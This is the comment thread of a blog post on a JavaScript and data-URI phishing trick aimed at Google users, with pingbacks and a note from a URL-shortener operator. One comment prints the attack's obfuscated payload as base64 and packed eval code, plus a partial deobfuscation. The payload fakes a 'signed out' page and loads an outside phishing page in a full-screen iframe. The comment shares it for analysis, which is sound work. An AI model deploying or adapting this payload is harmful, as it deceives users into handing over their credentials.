Comments

Phishing via JavaScript Google this time not PayPal — 9 Comments

  1. Pingback: Phishing Trick Targeting Google Relies on Data URIs to Mask the Page's Real URL • Chrome Geek

  2. Pingback: Phishing Trick Targeting Google Relies on Data URIs to Mask the Page’s Real URL – 国内安全新闻资讯

  3. Pingback: Phishing Trick Targeting Google Relies on Data URIs to Mask the Page's Real URL - News Press

  4. OK, that didn’t want to unpack.
    Here is the NL4EmV one

    Base64:

    ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUo
    cGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50
    b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2Uo
    YyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7
    cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJl
    Z0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnMy4yLmo9ImkgaCBr
    IGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsx
    LmM9XCdcJzsyLnAoXCdCXCcpWzBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjov
    L3EudC91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQxLCd8bGlu
    a3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVu
    dHxyZWx8c2hvcnRjdXR8aHJlZnxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxi
    ZWVufFNpZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfG53ZmFjaWxpdGll
    c3xodHRwfHNyY3x0b3B8YWJvdXR1c3xodG1sfHJlY2tpb3JlbnN8fG91dGVySFRNTHxib2R5fHdp
    ZHRofGhlYWR8YXBwZW5kQ2hpbGR8Ym9yZGVyfGNhdGNoJy5zcGxpdCgnfCcpLDAse30pKQ==

    Packed Java:

    eval(function(p,a,c,k,e,d){e=function(c){return(c

    Unpacked:

    window.document.title=”You have been Signed out”;
    try
    {
    (function()
    {
    var link=window.document.createElement(‘link’);
    link.type=’image/x-icon’;
    link.rel=’shortcut icon’;
    link.href=”;
    document.getElementsByTagName(‘head’)[0].appendChild(link)
    }
    ())
    }
    catch(e)
    {
    }
    window.document.body.outerHTML=””;

  5. Pingback: Злоумышленники обманывали жертв при помощи сервиса Google и data URI | IT-News.club

  6. We, the provider of the URL Shortner service “zg.al” a.k.a. Zeneligroup Redirection Service will take all the steps to remove those suspicious redirections and soon include a intelligent filter, to prevent any offence of Phishing.

    Please contact me if you have any questions

Leave a Reply

Your email address will not be published. Required fields are marked *

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close